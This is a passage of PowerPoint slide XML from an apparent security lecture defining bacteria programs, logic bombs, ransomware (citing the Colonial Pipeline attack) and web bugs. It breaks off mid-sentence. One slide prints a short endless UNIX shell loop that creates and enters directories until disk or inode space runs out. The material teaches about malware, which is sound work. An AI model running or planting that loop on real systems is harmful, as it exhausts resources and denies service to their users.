                        <a:t> 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Bacteria</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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913765" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>program that absorbs all of some class of resources by “multiplying” rapidl</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-175" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>y</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, hence the name</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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280"/>
                        </a:spcBef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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Example: for UNIX system, shell commands:</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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993140" marR="6299200">
                        <a:lnSpc>
                          <a:spcPts val="3170"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="30"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>whil</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> true do</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1450340" marR="6389370">
                        <a:lnSpc>
                          <a:spcPts val="3170"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>mkdi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>x </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>chdi</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" b="1" spc="0" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>x</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="993140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2400" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Courier New" panose="02070309020205020404"/>
                          <a:cs typeface="Courier New" panose="02070309020205020404"/>
                        </a:rPr>
                        <a:t>done</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400">
                        <a:latin typeface="Courier New" panose="02070309020205020404"/>
                        <a:cs typeface="Courier New" panose="02070309020205020404"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="800"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="10"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:endParaRPr sz="800"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1523365" indent="-342900">
                        <a:lnSpc>
                          <a:spcPts val="292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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Exhausts either disk space or file allocation table (inode) space</a:t>
                      </a:r>
                      <a:endParaRPr sz="27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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>31</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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7874371"/>
              </p:ext>
            </p:extLst>
          </p:nvPr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3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Logi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c </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Bombs</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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684530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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>A</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-15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700" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>program that performs an action that violates the site security policy when some external event occurs</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="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50"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1007745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 panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Example: program that </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700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deletes all of a company</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="-150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’</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2700" spc="0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s payroll records when one particular record is deleted</a:t>
                      </a:r>
                      <a:endParaRPr sz="2700" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="FF0000"/>
                        </a:solidFill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30"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="608965" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Th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e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“particula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r</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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record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”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i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s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usuall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y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tha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t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o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f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th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e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perso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n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writing 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the logic</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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bomb</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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25"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="550" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="1278890" marR="893445" lvl="1" indent="-28575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1278890" algn="l"/>
                        </a:tabLst>
                      </a:pP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Ide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a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i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s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i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f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(when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)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h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e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o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r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sh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e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i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s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fired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,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an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d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th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e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payrol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l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record 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deleted,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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the company</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="24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loses</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" spc="-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i="1" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>al</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2400" i="1" spc="-1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those records</a:t>
                      </a:r>
                      <a:endParaRPr sz="2400" dirty="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>32</a:t>
                      </a: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3600" b="1" spc="-5" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Ransomware</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1479550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Malicious software that encrypts data on the victim</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-165" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>’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s system using public key crypto.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1987550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The attacker</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>w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ill provide the private key necessary to recover</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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the data… for a fee.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="650240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The fee is generally</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="2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demanded</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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in Bitcoin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="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or other untraceable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="3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mechanism.</a:t>
                      </a:r>
                      <a:endParaRPr sz="3000" dirty="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 panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1452245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Propagation is similar to other malicious software: phishing, drive-by downloads, etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>33</a:t>
                      </a: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3600" b="1" spc="-5" smtClean="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>Ransomware</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3600" b="1" spc="-5" dirty="0" smtClean="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t> Example</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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1479550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lang="en-US" sz="3000" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>On</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> May 10, 2021, a top U. S. Pipeline - Colonial Pipeline was attacked by a </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>ransomware</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>, causing the pipeline to shut down</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1479550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lang="en-US" sz="3000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>It caused gasoline shortages in several southern states for several days</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="878840" marR="1479550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lang="en-US" sz="3000" baseline="0" dirty="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>It was believed that the attack originated from </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="3000" baseline="0" smtClean="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>within Russia</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3000" baseline="0" dirty="0" smtClean="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878840" marR="1479550" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buNone/>
                        <a:tabLst>
                          <a:tab pos="878840" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="3000" dirty="0" smtClean="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 panose="020B0604020202020204"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204"/>
                        </a:rPr>
                        <a:t>33</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400">
                        <a:latin typeface="Arial" panose="020B0604020202020204"/>
                        <a:cs typeface="Arial" panose="020B060402020202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3600" b="1" spc="-60" dirty="0">
                          <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                          <a:cs typeface="Arial Narrow" panose="020B0606020202030204"/>
                        </a:rPr>
                        <a:t>W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eb Bugs</a:t>
                      </a:r>
                      <a:endParaRPr sz="3600">
                        <a:latin typeface="Arial Narrow" panose="020B0606020202030204"/>
                        <a:cs typeface="Arial Narrow" panose="020B060602020203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612140">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="3000" spc="-215" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>T</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="3000" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>w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o kinds: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700"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="955040" marR="805180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955040" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2900" spc="-235" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>b</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>pages:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>cause</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>hard-to-spot</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="29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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>download</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>from</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a third-party</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-7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900" spc="-235" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>W</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>b</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>server;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>server</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>can</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>now</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>set</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a cookie.</a:t>
                      </a:r>
                      <a:endParaRPr sz="29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40"/>
                        </a:spcBef>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                      </a:pPr>
                      <a:endParaRPr sz="700"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="955040" marR="331470" indent="-342900">
                        <a:lnSpc>
                          <a:spcPct val="99000"/>
                        </a:lnSpc>
                        <a:buFont typeface="Arial" panose="020B0604020202020204"/>
                        <a:buChar char="•"/>
                        <a:tabLst>
                          <a:tab pos="955040" algn="l"/>
                          <a:tab pos="2470785" algn="l"/>
                        </a:tabLst>
                      </a:pPr>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Email</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> th</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> UR</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>L</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-9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900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>contain</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>s</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-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900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> cod</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> uniqu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> t</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>o</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t> the message</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>.	</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>Th</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="0" dirty="0">
                          <a:latin typeface="Times New Roman" panose="02020603050405020304"/>
                          <a:cs typeface="Times New Roman" panose="02020603050405020304"/>
                        </a:rPr>
                        <a:t>e</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr sz="2900" spc="-5" dirty="0">
